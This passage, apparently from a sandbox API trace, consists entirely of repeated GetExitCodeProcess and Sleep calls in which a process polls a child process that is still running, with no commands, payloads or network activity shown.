lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0211.111] Sleep (dwMilliseconds=0x19) [0211.180] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0211.180] Sleep (dwMilliseconds=0x19) [0211.294] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0211.294] Sleep (dwMilliseconds=0x19) [0211.403] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0211.403] Sleep (dwMilliseconds=0x19) [0211.441] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0211.441] Sleep (dwMilliseconds=0x19) [0211.515] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0211.516] Sleep (dwMilliseconds=0x19) [0211.614] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0211.615] Sleep (dwMilliseconds=0x19) [0211.687] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0211.687] Sleep (dwMilliseconds=0x19) [0211.757] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0211.757] Sleep (dwMilliseconds=0x19) [0211.859] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0211.860] Sleep (dwMilliseconds=0x19) [0211.960] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0211.960] Sleep (dwMilliseconds=0x19) [0212.129] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0212.129] Sleep (dwMilliseconds=0x19) [0212.251] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0212.251] Sleep (dwMilliseconds=0x19) [0212.322] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0212.322] Sleep (dwMilliseconds=0x19) [0212.398] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0212.398] Sleep (dwMilliseconds=0x19) [0212.488] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0212.489] Sleep (dwMilliseconds=0x19) [0212.631] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0212.631] Sleep (dwMilliseconds=0x19) [0212.737] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0212.737] Sleep (dwMilliseconds=0x19) [0212.805] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0212.805] Sleep (dwMilliseconds=0x19) [0212.920] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0212.921] Sleep (dwMilliseconds=0x19) [0213.026] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0213.027] Sleep (dwMilliseconds=0x19) [0213.285] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0213.286] Sleep (dwMilliseconds=0x19) [0213.394] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0213.394] Sleep (dwMilliseconds=0x19) [0213.500] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0213.500] Sleep (dwMilliseconds=0x19) [0213.638] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0213.638] Sleep (dwMilliseconds=0x19) [0213.750] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0213.750] Sleep (dwMilliseconds=0x19) [0213.812] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0213.812] Sleep (dwMilliseconds=0x19) [0213.892] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0213.892] Sleep (dwMilliseconds=0x19) [0213.969] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0213.970] Sleep (dwMilliseconds=0x19) [0214.028] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0214.028] Sleep (dwMilliseconds=0x19) [0214.110] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0214.110] Sleep (dwMilliseconds=0x19) [0214.284] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0214.284] Sleep (dwMilliseconds=0x19) [0214.366] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0214.366] Sleep (dwMilliseconds=0x19) [0214.452] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0214.452] Sleep (dwMilliseconds=0x19) [0214.507] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0214.508] Sleep (dwMilliseconds=0x19) [0214.546] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0214.546] Sleep (dwMilliseconds=0x19) [0214.578] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0214.578] Sleep (dwMilliseconds=0x19) [0214.635] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0214.635] Sleep (dwMilliseconds=0x19) [0214.665] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0214.665] Sleep (dwMilliseconds=0x19) [0214.700] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0214.700] Sleep (dwMilliseconds=0x19) [0214.730] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0214.730] Sleep (dwMilliseconds=0x19) [0214.828] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0214.828] Sleep (dwMilliseconds=0x19) [0214.854] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0214.854] Sleep (dwMilliseconds=0x19) [0214.908] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0214.908] Sleep (dwMilliseconds=0x19) [0214.965] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0214.965] Sleep (dwMilliseconds=0x19) [0214.997] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0214.997] Sleep (dwMilliseconds=0x19) [0215.037] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0215.037] Sleep (dwMilliseconds=0x19) [0215.063] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0215.063] Sleep (dwMilliseconds=0x19) [0215.112] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0215.112] Sleep (dwMilliseconds=0x19) [0215.262] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0215.262] Sleep (dwMilliseconds=0x19) [0215.317] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0215.317] Sleep (dwMilliseconds=0x19) [0215.351] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0215.351] Sleep (dwMilliseconds=0x19) [0215.392] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0215.392] Sleep (dwMilliseconds=0x19) [0215.419] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0215.419] Sleep (dwMilliseconds=0x19) [0215.450] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0215.450] Sleep (dwMilliseconds=0x19) [0215.484] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0215.484] Sleep (dwMilliseconds=0x19) [0215.592] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0215.592] Sleep (dwMilliseconds=0x19) [0215.627] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0215.627] Sleep (dwMilliseconds=0x19) [0215.662] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0215.662] Sleep (dwMilliseconds=0x19) [0215.708] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0215.708] Sleep (dwMilliseconds=0x19) [0215.743] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0215.743] Sleep (dwMilliseconds=0x19) [0215.780] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0215.780] Sleep (dwMilliseconds=0x19) [0215.814] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0215.814] Sleep (dwMilliseconds=0x19) [0215.888] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0215.889] Sleep (dwMilliseconds=0x19) [0215.923] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0215.923] Sleep (dwMilliseconds=0x19) [0215.971] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0215.972] Sleep (dwMilliseconds=0x19) [0216.024] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0216.024] Sleep (dwMilliseconds=0x19) [0216.084] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0216.084] Sleep (dwMilliseconds=0x19) [0216.118] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0216.119] Sleep (dwMilliseconds=0x19) [0216.152] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0216.152] Sleep (dwMilliseconds=0x19) [0216.261] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0216.262] Sleep (dwMilliseconds=0x19) [0216.363] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0216.363] Sleep (dwMilliseconds=0x19) [0216.476] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0216.476] Sleep (dwMilliseconds=0x19) [0216.549] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0216.549] Sleep (dwMilliseconds=0x19) [0216.633] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0216.633] Sleep (dwMilliseconds=0x19) [0216.669] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0216.669] Sleep (dwMilliseconds=0x19) [0216.703] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0216.703] Sleep (dwMilliseconds=0x19) [0216.753] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0216.754] Sleep (dwMilliseconds=0x19) [0216.789] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0216.789] Sleep (dwMilliseconds=0x19) [0216.917] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0216.917] Sleep (dwMilliseconds=0x19) [0217.077] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0217.077] Sleep (dwMilliseconds=0x19) [0217.127] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0217.127] Sleep (dwMilliseconds=0x19) [0217.162] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0217.162] Sleep (dwMilliseconds=0x19) [0217.210] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0217.210] Sleep (dwMilliseconds=0x19) [0217.285] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0217.285] Sleep (dwMilliseconds=0x19) [0217.354] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0217.354] Sleep (dwMilliseconds=0x19) [0217.396] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0217.396] Sleep (dwMilliseconds=0x19) [0217.467] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0217.467] Sleep (dwMilliseconds=0x19) [0217.502] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0217.502] Sleep (dwMilliseconds=0x19) [0217.557] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0217.557] Sleep (dwMilliseconds=0x19) [0217.594] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0217.594] Sleep (dwMilliseconds=0x19) [0217.631] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0217.632] Sleep (dwMilliseconds=0x19) [0217.668] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0217.668] Sleep (dwMilliseconds=0x19) [0217.711] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0217.711] Sleep (dwMilliseconds=0x19) [0217.783] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0217.783] Sleep (dwMilliseconds=0x19) [0217.824] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0217.824] Sleep (dwMilliseconds=0x19) [0217.858] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0217.858] Sleep (dwMilliseconds=0x19) [0217.903] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0217.904] Sleep (dwMilliseconds=0x19) [0217.944] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0217.944] Sleep (dwMilliseconds=0x19) [0217.987] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0217.987] Sleep (dwMilliseconds=0x19) [0218.148] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0218.149] Sleep (dwMilliseconds=0x19) [0218.192] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0218.192] Sleep (dwMilliseconds=0x19) [0218.297] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0218.297] Sleep (dwMilliseconds=0x19) [0218.469] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0218.469] Sleep (dwMilliseconds=0x19) [0218.515] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0218.515] Sleep (dwMilliseconds=0x19) [0218.570] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0218.570] Sleep (dwMilliseconds=0x19) [0218.608] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0218.608] Sleep (dwMilliseconds=0x19) [0218.655] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0218.655] Sleep (dwMilliseconds=0x19) [0218.693] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0218.693] Sleep (dwMilliseconds=0x19) [0218.737] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0218.737] Sleep (dwMilliseconds=0x19) [0218.776] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0218.776] Sleep (dwMilliseconds=0x19) [0218.812] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0218.812] Sleep (dwMilliseconds=0x19) [0218.857] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0218.857] Sleep (dwMilliseconds=0x19) [0218.893] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0218.893] Sleep (dwMilliseconds=0x19) [0218.928] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0218.928] Sleep (dwMilliseconds=0x19) [0218.967] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0218.967] Sleep (dwMilliseconds=0x19) [0219.002] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0219.002] Sleep (dwMilliseconds=0x19) [0219.037] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0219.037] Sleep (dwMilliseconds=0x19) [0219.080] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0219.080] Sleep (dwMilliseconds=0x19) [0219.114] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0219.114] Sleep (dwMilliseconds=0x19) [0219.151] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0219.151] Sleep (dwMilliseconds=0x19) [0219.186] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0219.186] Sleep (dwMilliseconds=0x19) [0219.288] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0219.288] Sleep (dwMilliseconds=0x19) [0219.328] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0219.328] Sleep (dwMilliseconds=0x19) [0219.374] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0219.375] Sleep (dwMilliseconds=0x19) [0219.412] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0219.412] Sleep (dwMilliseconds=0x19) [0219.550] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0219.550] Sleep (dwMilliseconds=0x19) [0219.637] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0219.637] Sleep (dwMilliseconds=0x19) [0219.678] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0219.678] Sleep (dwMilliseconds=0x19) [0219.722] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0219.722] Sleep (dwMilliseconds=0x19) [0219.748] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0219.748] Sleep (dwMilliseconds=0x19) [0219.789] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0219.789] Sleep (dwMilliseconds=0x19) [0219.815] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0219.815] Sleep (dwMilliseconds=0x19) [0219.860] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0219.860] Sleep (dwMilliseconds=0x19) [0219.895] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0219.895] Sleep (dwMilliseconds=0x19) [0219.995] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0219.995] Sleep (dwMilliseconds=0x19) [0220.030] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0220.031] Sleep (dwMilliseconds=0x19) [0220.071] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0220.071] Sleep (dwMilliseconds=0x19) [0220.131] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0220.131] Sleep (dwMilliseconds=0x19) [0220.162] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0220.162] Sleep (dwMilliseconds=0x19) [0220.188] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0220.188] Sleep (dwMilliseconds=0x19) [0220.228] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0220.228] Sleep (dwMilliseconds=0x19) [0220.290] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0220.290] Sleep (dwMilliseconds=0x19) [0220.322] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0220.322] Sleep (dwMilliseconds=0x19) [0220.355] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0220.355] Sleep (dwMilliseconds=0x19) [0220.440] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0220.440] Sleep (dwMilliseconds=0x19) [0220.492] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0220.492] Sleep (dwMilliseconds=0x19) [0220.553] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0220.553] Sleep (dwMilliseconds=0x19) [0220.587] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0220.587] Sleep (dwMilliseconds=0x19) [0220.628] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0220.628] Sleep (dwMilliseconds=0x19) [0220.655] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0220.655] Sleep (dwMilliseconds=0x19) [0220.681] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0220.681] Sleep (dwMilliseconds=0x19) [0220.717] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0220.717] Sleep (dwMilliseconds=0x19) [0220.750] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0220.750] Sleep (dwMilliseconds=0x19) [0220.850] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0220.851] Sleep (dwMilliseconds=0x19) [0220.892] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0220.892] Sleep (dwMilliseconds=0x19) [0220.939] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0220.939] Sleep (dwMilliseconds=0x19) [0221.032] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0221.032] Sleep (dwMilliseconds=0x19) [0221.068] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0221.068] Sleep (dwMilliseconds=0x19) [0221.107] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0221.107] Sleep 